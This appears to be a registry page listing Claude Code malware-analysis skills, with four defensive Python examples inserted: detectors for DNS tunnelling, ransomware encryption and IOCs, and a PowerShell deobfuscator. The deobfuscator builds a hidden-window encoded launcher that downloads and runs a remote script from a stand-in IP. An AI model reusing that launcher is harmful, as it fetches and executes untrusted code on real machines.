Claude Code Skills · The open SKILL.md registry for Claude

Malware Analysis

106 Claude Code skills in the Malware Analysis sub-category of Security.

106 skills · updated 2026-05-27 · showing 1–60 of 106 by quality score


Researches malware analysis, CVEs, attribution reports, and hacker community sources. Use when the album subject involves cybersecurity incidents or threat actors.
Write and test YARA rules for malware detection and threat hunting. Use when creating YARA signatures, detecting malware families, scanning files or memory for indicators of…
Pre-add risk gate for a new dependency — composes vuln history (`vdb vulns`), AI-malware check (`vdb ai-malware`), license compatibility, EOL status, maintainer health,…
Prepares a hearing/deposition question outline for a witness or party (isticvap); pulls internal company documents or UYAP filings and organizes the headings around the legal theory…
Android APK analysis using GDA.exe. AI drives analysis by tracing code paths, extracting IOCs (including encrypted), and producing structured malware reports.
Pixa.com (formerly Pixelcut): creative AI tools that connect to Claude MCP-natively. Remove backgrounds, generate images, enhance quality, generate video, erase objects. No API key required.
Typosquat and malicious-package detection across installed dependencies (or a single prospective addition) — cross-checks AI-malware family intelligence, package-name similarity…
YARA rule creation, testing, and deployment
Discovers new Claude skills/MCPs/tools by scanning GitHub, the Anthropic blog and community sources. Adds them to REPO_CATALOG.md and prepares them for /ai-upgrade.
Inspect captured RAM images to enumerate processes, modules, handles, and suspicious in-memory behavior before escalation or evidence handoff.
Perform static analysis of Android APK malware samples using apktool for decompilation, jadx for Java source
Analyzes bootkit and advanced rootkit malware that infects the Master Boot Record (MBR), Volume Boot Record
Reverse engineer Go-compiled malware using Ghidra with specialized scripts for function recovery, string extraction,
Performs runtime mobile security exploration of iOS applications using Objection, a Frida-powered toolkit that
Analyzes malicious Linux ELF (Executable and Linkable Format) binaries including botnets, cryptominers, ransomware,
Analyzes malicious VBA macros embedded in Microsoft Office documents (Word, Excel, PowerPoint) to identify download
Executes malware samples in Cuckoo Sandbox to observe runtime behavior including process creation, file system
Use Sysinternals Autoruns to systematically identify and analyze malware persistence mechanisms across registry
Detect sandbox evasion techniques in malware samples by analyzing timing checks, VM artifact queries, user interaction
Detect and analyze covert communication channels used by malware including DNS tunneling, ICMP exfiltration,
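As an added example for the DNS-tunneling half of that entry (not code from the listed skill), the following scores a constructed query log per parent domain: average subdomain label length, the share of labels that look hex- or base32-encoded, the ratio of distinct names to queries, and the share of TXT-type queries, then flags parents that exceed every threshold. The log format, the thresholds and the `exfil-test.net` name are assumptions.

```python
import re
from collections import defaultdict

# Constructed DNS query log (not real traffic); "<epoch> <client> <qname> <qtype>" is an assumed format.
SAMPLE_LOG = """\
1716800001 10.0.0.5 www.example.com A
1716800002 10.0.0.5 mail.example.com MX
1716800003 10.0.0.9 3a7f9c0e4b1d2a6f8e5c.exfil-test.net TXT
1716800004 10.0.0.9 9d1c4e7a2b5f0c3e6a8b.exfil-test.net TXT
1716800005 10.0.0.9 c4e0a1f7b2d9e3c5a6b8.exfil-test.net TXT
1716800006 10.0.0.9 0f2e4d6c8b1a3e5f7d9c.exfil-test.net TXT
1716800007 10.0.0.9 7b9d1f3a5c7e9b0d2f4a.exfil-test.net TXT
1716800008 10.0.0.5 cdn.example.com A
1716800009 10.0.0.7 static.example.com A
"""

LINE_RE = re.compile(r"^(\d+)\s+(\S+)\s+(\S+)\s+(\S+)$")
# Labels drawn entirely from the hex or base32 alphabets are typical of encoded payload chunks.
ENCODED_LABEL_RE = re.compile(r"^(?:[0-9a-f]+|[a-z2-7]+)$")
MIN_ENCODED_LEN = 16  # "www" and "cdn" also fit base32, so require length as well


def split_name(qname):
    """Return (subdomain labels, parent). Parent = last two labels, an approximation."""
    labels = qname.rstrip(".").lower().split(".")
    return labels[:-2], ".".join(labels[-2:])


def parse_log(text):
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            ts, client, qname, qtype = m.groups()
            events.append((int(ts), client, qname, qtype))
    return events


def score_domains(events, min_queries=3):
    """Per-parent features for parents seen at least min_queries times."""
    stats = defaultdict(lambda: {"queries": 0, "names": set(), "labels": 0,
                                 "label_len": 0, "encoded": 0, "txt": 0})
    for _ts, _client, qname, qtype in events:
        subs, parent = split_name(qname)
        s = stats[parent]
        s["queries"] += 1
        s["names"].add(qname.lower())
        s["txt"] += qtype.upper() in ("TXT", "NULL")  # record types that carry bulk data back
        for lab in subs:
            s["labels"] += 1
            s["label_len"] += len(lab)
            s["encoded"] += len(lab) >= MIN_ENCODED_LEN and bool(ENCODED_LABEL_RE.match(lab))
    scores = {}
    for parent, s in stats.items():
        if s["queries"] < min_queries:
            continue
        labels = s["labels"] or 1
        scores[parent] = {
            "queries": s["queries"],
            "avg_label_len": s["label_len"] / labels,
            "encoded_ratio": s["encoded"] / labels,
            "unique_ratio": len(s["names"]) / s["queries"],  # tunnels rarely repeat a name
            "txt_ratio": s["txt"] / s["queries"],
        }
    return scores


def flag_tunnels(scores, avg_len_min=12.0, encoded_min=0.5, unique_min=0.8):
    """Parents exceeding every threshold, sorted; thresholds are assumptions to tune locally."""
    return sorted(p for p, f in scores.items()
                  if f["avg_label_len"] >= avg_len_min
                  and f["encoded_ratio"] >= encoded_min
                  and f["unique_ratio"] >= unique_min)


if __name__ == "__main__":
    for parent in flag_tunnels(score_domains(parse_log(SAMPLE_LOG))):
        print("possible DNS tunnel:", parent)
```

Two-label parent extraction is an approximation; use the public suffix list for names such as `example.co.uk`. CDNs, anti-spam lookups and some telemetry services also emit long hash-like labels, so keep an allowlist and corroborate with query volume per client before escalating.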
Identifies and unpacks UPX-packed and other packed malware samples to expose the original executable code for
Analyzes malicious PDF files using PDFiD, pdf-parser, and peepdf to identify embedded JavaScript, shellcode,
Analyzes encryption algorithms, key management, and file encryption routines used by ransomware families to
Monitor and analyze ransomware group data leak sites (DLS) to track victim postings, extract threat intelligence
Identify ransomware network indicators including C2 beaconing patterns, TOR exit node connections, data exfiltration
Traces ransomware cryptocurrency payment flows using blockchain analysis tools such as Chainalysis Reactor,
Investigate supply chain attack artifacts including trojanized software updates, compromised build pipelines,
Decompile Android APK, XAPK, JAR, and AAR files using jadx or Fernflower/Vineflower. Reverse engineer Android apps, extract HTTP API endpoints, trace call flows from UI to network…
Builds an automated malware submission and analysis pipeline that collects suspicious files from endpoints and
Build structured communication templates for malware incidents including stakeholder notifications, executive
Builds a structured ransomware incident response playbook aligned with the CISA StopRansomware Guide and NIST
Builds a structured SOC incident response playbook for ransomware attacks covering detection, containment, eradication,
Static analysis of UEFI/BIOS firmware dumps using Intel's chipsec framework. Decode firmware structure, detect known malware and rootkits (LoJax, ThinkPwn, HackingTeam,…
Expert CIS Controls v8 (CIS Top 18) advisor — implementation group scoping (IG1/IG2/IG3), control gap assessments, safeguard-level guidance, asset inventory, software inventory,…
Responds to malware infections across enterprise endpoints by identifying the malware family, determining infection
Performs memory forensics analysis using Volatility 3 to extract evidence of malware execution, process injection,
Malware and network analysis techniques for CTF challenges. Use when analyzing obfuscated scripts, malicious packages, custom protocols, or C2 traffic.
Deobfuscates malicious JavaScript code used in web-based attacks, phishing pages, and dropper scripts by reversing
Systematically deobfuscate multi-layer PowerShell malware using AST analysis, dynamic tracing, and tools like
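As an added example of the static passes that entry describes (not the skill's own code; the sample is constructed inside the block), a deobfuscator that peels a three-layer launcher: `-EncodedCommand` base64 over UTF-16LE, an inner `FromBase64String` wrapped in `GetString`, string concatenation, `[char]` arithmetic, and single-literal variables used with the call operator, then extracts the download URL. The host and script name are assumptions.

```python
import base64
import re


def _b64(data: bytes) -> str:
    return base64.b64encode(data).decode("ascii")


def build_sample() -> str:
    """Construct a three-layer launcher the way a dropper would (not a real sample; host is assumed)."""
    stage2 = ("$u=('ht'+'tp://'+'198.51.100'+'.23/'+'st'+'age2.ps1');"
              "$d=[char]73+[char]69+[char]88;"
              "&$d (New-Object Net.WebClient).DownloadString($u)")
    stage1 = ("$s=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('"
              + _b64(stage2.encode("utf-8")) + "'));IEX $s")
    return "powershell.exe -NoP -W Hidden -EncodedCommand " + _b64(stage1.encode("utf-16-le"))


# -EncodedCommand (and its abbreviations) carries base64 of UTF-16LE script text.
ENC_FLAG_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{8,})", re.I)
FROM_B64_RE = re.compile(
    r"\[(?:System\.)?Text\.Encoding\]::(UTF8|Unicode|ASCII)\.GetString\("
    r"\[(?:System\.)?Convert\]::FromBase64String\('([A-Za-z0-9+/=]+)'\)\)", re.I)
CONCAT_RE = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")
CHAR_SEQ_RE = re.compile(r"(?:\[char\]\d{1,3}\s*\+\s*)+\[char\]\d{1,3}", re.I)
PAREN_LIT_RE = re.compile(r"\('([^']*)'\)")
ASSIGN_RE = re.compile(r"\$(\w+)=('[^']*');")
URL_RE = re.compile(r"https?://[^\s'\")]+", re.I)


def fold_concat(s: str) -> str:
    """'a'+'b'+'c' -> 'abc', repeated until nothing changes."""
    prev = None
    while prev != s:
        prev, s = s, CONCAT_RE.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", s)
    return s


def fold_chars(s: str) -> str:
    """[char]73+[char]69+[char]88 -> 'IEX'."""
    return CHAR_SEQ_RE.sub(
        lambda m: "'" + "".join(chr(int(n)) for n in re.findall(r"\d{1,3}", m.group(0))) + "'", s)


def inline_literals(s: str) -> str:
    """Drop $name='literal'; assignments and substitute the literal where $name is used."""
    names = {}

    def grab(m):
        names[m.group(1)] = m.group(2)
        return ""
    s = ASSIGN_RE.sub(grab, s)
    for name, lit in names.items():
        s = s.replace("&$" + name, lit.strip("'"))  # call operator on a string = bare command
        s = s.replace("$" + name, lit)
    return s


def simplify(script: str) -> str:
    s = fold_chars(fold_concat(script))
    s = PAREN_LIT_RE.sub(r"'\1'", s)  # ('literal') -> 'literal', before inlining adds new parens
    return inline_literals(s)


def deobfuscate(cmdline: str, max_layers: int = 10) -> list:
    """Peel encoding layers, then fold the last one; returns [(description, text), ...]."""
    layers, text = [], cmdline
    for _ in range(max_layers):
        m = ENC_FLAG_RE.search(text)
        if m:
            text = base64.b64decode(m.group(1)).decode("utf-16-le")
            layers.append(("EncodedCommand (base64/UTF-16LE)", text))
            continue
        m = FROM_B64_RE.search(text)
        if m:  # the decoded text is what IEX would run, so treat it as the next layer
            codec = {"utf8": "utf-8", "unicode": "utf-16-le", "ascii": "ascii"}[m.group(1).lower()]
            text = base64.b64decode(m.group(2)).decode(codec)
            layers.append((f"FromBase64String ({m.group(1)})", text))
            continue
        break
    layers.append(("simplified", simplify(text)))
    return layers


def extract_urls(script: str) -> list:
    return sorted(set(URL_RE.findall(script)))


if __name__ == "__main__":
    for desc, text in deobfuscate(build_sample()):
        print(f"[{desc}] {text}")
```

The passes are deliberately narrow: real samples add the `-f` format operator, `-join`, `-replace`, Deflate streams and strings built at runtime, and when static folding stalls the practical next step is dynamic tracing (PowerShell script block logging, event ID 4104) in an isolated VM.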
Deploys canary files (honeytokens) across file systems to detect ransomware encryption activity in real time.
Deploys and monitors ransomware canary files across critical directories using Python's watchdog library for
Detects and analyzes fileless malware that operates entirely in memory using PowerShell, WMI, .NET reflection,
Detects and analyzes malicious behavior in mobile applications through behavioral analysis, permission abuse
Detects ransomware encryption activity in real time using entropy analysis, file system I/O monitoring, and
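The canary-file entries above and this entropy entry describe two signals that combine well. The following is an added example (not code from the listed skills) that classifies a constructed stream of file writes: a touch of a canary path is an alert by itself, a rewrite that replaces a known plaintext header such as `%PDF` with near-8-bits-per-byte data is an encrypted overwrite, and compressed or image formats are left alone because they are high-entropy by design. Events are simulated as (path, before, after) tuples rather than read from watchdog; the canary paths and thresholds are assumptions.

```python
import hashlib
import math
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty or constant input, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


HIGH_ENTROPY = 7.2  # assumed threshold: text is ~4-5 bits/byte, ciphertext ~7.9+

# Headers of formats that are not compressed; ciphertext replacing one of them is the signal.
PLAINTEXT_MAGIC = {b"%PDF": "pdf", b"{\\rtf": "rtf", b"<?xml": "xml", b"\xef\xbb\xbf": "utf8-text"}
# Formats that are high-entropy by design; entropy says nothing about them.
COMPRESSED_MAGIC = {b"PK\x03\x04": "zip/office", b"\xff\xd8\xff": "jpeg", b"\x89PNG": "png", b"\x1f\x8b": "gzip"}
# Hypothetical canary files planted where ransomware enumerates early (sorted-first names, hidden files).
CANARY_PATHS = {"/srv/share/finance/00_do_not_delete.xlsx", "/srv/share/hr/.canary.docx"}


def format_of(data: bytes, table: dict):
    for magic, name in table.items():
        if data.startswith(magic):
            return name
    return None


def classify_write(path: str, before: bytes, after: bytes) -> str:
    """Verdict for one observed write: canary, encrypted-overwrite, suspicious or benign."""
    if path in CANARY_PATHS:
        return "canary"  # nothing legitimate writes here; any touch is an alert
    if format_of(after, COMPRESSED_MAGIC):
        return "benign"  # a real archive/image keeps its header; ciphertext would not
    if shannon_entropy(after) < HIGH_ENTROPY:
        return "benign"
    if format_of(before, PLAINTEXT_MAGIC) and not format_of(after, PLAINTEXT_MAGIC):
        return "encrypted-overwrite"  # known plaintext format replaced by random-looking bytes
    return "suspicious"  # high entropy with no recognised header; needs context


def burst_alert(verdicts, window=10, threshold=3) -> bool:
    """Alert when the last `window` writes contain at least `threshold` strong hits."""
    strong = {"canary", "encrypted-overwrite"}
    return sum(v in strong for v in list(verdicts)[-window:]) >= threshold


def fake_ciphertext(n: int, seed: bytes = b"constructed") -> bytes:
    """Deterministic high-entropy stand-in for encrypted output (SHA-256 in counter mode)."""
    out, ctr = b"", 0
    while len(out) < n:
        out += hashlib.sha256(seed + ctr.to_bytes(4, "big")).digest()
        ctr += 1
    return out[:n]


def demo():
    """Replay a constructed sequence of (path, before, after) writes; returns (verdicts, alert)."""
    pdf = b"%PDF-1.4\n" + b"Quarterly report text, repeated for realism. " * 60
    writes = [
        ("/srv/share/finance/q1.pdf", pdf, pdf + b"\n%%EOF\n"),                          # ordinary edit
        ("/srv/share/finance/q2.pdf", pdf, fake_ciphertext(4096, b"q2")),                 # encrypted in place
        ("/srv/share/finance/q3.pdf", pdf, fake_ciphertext(4096, b"q3")),
        ("/srv/share/photos/a.jpg", b"", b"\xff\xd8\xff" + fake_ciphertext(2048, b"jpg")),  # new JPEG
        ("/srv/share/finance/00_do_not_delete.xlsx", b"PK\x03\x04", fake_ciphertext(1024, b"c")),
    ]
    verdicts = [classify_write(p, b, a) for p, b, a in writes]
    return verdicts, burst_alert(verdicts)


if __name__ == "__main__":
    print(demo())
```

Entropy alone is a weak signal: archives, media and already-encrypted files sit near 8 bits per byte, and families that use intermittent or partial encryption keep whole-file entropy low. The burst rule (several strong hits in a short window) and the canary touch are what make the verdict actionable; tune `HIGH_ENTROPY` and the window against your own file population.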
Detects early-stage ransomware indicators in network traffic before encryption begins, including initial access
Lists creative, memorable domain names from the keywords and numeric targets the user specifies. Adjusts length when short versions are requested.
Systematically remove malware, backdoors, and attacker persistence mechanisms from infected systems while ensuring
Extract embedded configuration from Agent Tesla RAT samples including SMTP/FTP/Telegram exfiltration credentials,
Extracts indicators of compromise (IOCs) from malware samples including file hashes, network indicators (IPs,
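An added IOC extractor for that entry (not the skill's code) run over a constructed strings dump: it refangs `hxxp` and `[.]` notation, pulls URLs, IPv4 addresses, domains and MD5/SHA-1/SHA-256 hashes with standard-library regexes, drops RFC 1918, loopback and link-local addresses, skips dotted-quads that follow a version keyword, applies a domain allowlist, and provides a `defang` helper for reporting. The two hashes are the published EICAR test-file hashes; the hosts and the allowlist are assumptions.

```python
import ipaddress
import re
from urllib.parse import urlparse

# Constructed strings dump (not from a real sample). Hosts use RFC 5737 documentation ranges
# and example.* names; the hashes are the published EICAR test-file MD5 and SHA-256.
SAMPLE_STRINGS = """
hxxp://update-check[.]example-cdn[.]net/api/v2/beacon.php
https://198.51.100.23:8443/gate
C2 fallback: 203.0.113.77
local: 127.0.0.1 10.0.0.5 192.168.1.10
version 1.2.3.4 build 5
md5=44d88612fea8a8f36de82e1278abb02f
sha256=275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f
www.microsoft.com legitimate-looking decoy
malware.example.org
"""

URL_RE = re.compile(r"\b(?:https?|ftp)://[^\s\"'<>]+", re.I)
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
DOMAIN_RE = re.compile(r"\b(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,24}\b", re.I)
HASH_RE = re.compile(r"\b(?:[0-9a-f]{64}|[0-9a-f]{40}|[0-9a-f]{32})\b", re.I)
VERSION_CTX_RE = re.compile(r"\b(?:version|ver|build)\s*[:=]?\s*$", re.I)
# Address space that is never a useful network IOC. Documentation ranges are deliberately
# not excluded so the constructed sample survives; add them back in production.
NON_ROUTABLE = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16", "172.16.0.0/12",
    "192.168.0.0/16", "224.0.0.0/4", "255.255.255.255/32")]
ALLOWLIST_DOMAINS = {"microsoft.com", "windowsupdate.com"}  # assumed benign suffixes


def refang(s: str) -> str:
    return (s.replace("[.]", ".").replace("(.)", ".").replace("{.}", ".")
             .replace("hxxp", "http").replace("hXXp", "http").replace("HXXP", "HTTP"))


def defang(s: str) -> str:
    """Make an indicator safe to paste into reports and chat."""
    return s.replace("http", "hxxp").replace(".", "[.]")


def is_ip(s: str) -> bool:
    try:
        ipaddress.ip_address(s)
        return True
    except ValueError:
        return False


def routable(ip_str: str) -> bool:
    try:
        ip = ipaddress.ip_address(ip_str)
    except ValueError:
        return False  # e.g. an octet over 255 that the loose regex let through
    return not any(ip in net for net in NON_ROUTABLE)


def allowlisted(domain: str) -> bool:
    return any(domain == a or domain.endswith("." + a) for a in ALLOWLIST_DOMAINS)


def extract_iocs(text: str) -> dict:
    clean = refang(text)
    urls = {m.group(0) for m in URL_RE.finditer(clean)}
    ips, domains = set(), set()
    for u in urls:
        host = (urlparse(u).hostname or "").lower()
        if host:
            (ips if is_ip(host) else domains).add(host)
    for m in IPV4_RE.finditer(clean):
        if not VERSION_CTX_RE.search(clean[max(0, m.start() - 12):m.start()]):
            ips.add(m.group(0))
    for m in DOMAIN_RE.finditer(URL_RE.sub(" ", clean)):  # bare names outside URLs
        domains.add(m.group(0).lower())
    hashes = {}
    for m in HASH_RE.finditer(clean):
        h = m.group(0).lower()
        hashes.setdefault({32: "md5", 40: "sha1", 64: "sha256"}[len(h)], set()).add(h)
    return {
        "urls": sorted(urls),
        "ips": sorted(ip for ip in ips if routable(ip)),
        "domains": sorted(d for d in domains if not allowlisted(d)),
        "hashes": {k: sorted(v) for k, v in sorted(hashes.items())},
    }


if __name__ == "__main__":
    for kind, values in extract_iocs(SAMPLE_STRINGS).items():
        print(kind, values)
```

The output is keyed by type so it can feed a blocklist or a STIX bundle directly; defang before pasting into tickets. Expect residual false positives (hashes of clean system binaries, file names that look like domains such as `setup.exe` style strings with real TLDs) and triage before blocking.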
Immediate measures after a cyber incident: ransomware, data leak, hack. 72-hour reporting obligations under Art. 33 GDPR (DSGVO), BSIG and NIS2UmsuCG, critical infrastructure.
Cyber insurance for ransomware with sanctions risk: OFAC, EU Regulation 833/2014, Regulation 269/2014, Russia sanctions. Insurers' coverage defenses against ransom payments.
Use when designing malware and content scanning for files uploaded to Salesforce (Files, Attachments, ContentVersion) — external scanning service callouts, quarantine patterns,…
Quantitative trading expertise for DeFi and crypto derivatives. Use when building trading strategies, signals, risk management.
Supply-chain malware infection scanner. IoC-based local scan + safe eradication for npm/PyPI worm campaigns (Mini Shai-Hulud 1st/2nd, S1ngularity, lottie-player).
Configures Windows Group Policy Objects (GPO) to prevent ransomware execution and limit its spread. Implements
Email sandboxing detonates suspicious attachments and URLs in isolated environments to detect zero-day malware
Configure Google Workspace advanced phishing and malware protection settings including pre-delivery scanning,
Deploys canary files, honeypot shares, and decoy systems to detect ransomware activity at the earliest possible
Implements immutable backup strategy using restic with S3-compatible storage and object lock for ransomware-resistant
Deploy and configure Proofpoint Email Protection as a secure email gateway to detect and block phishing, malware,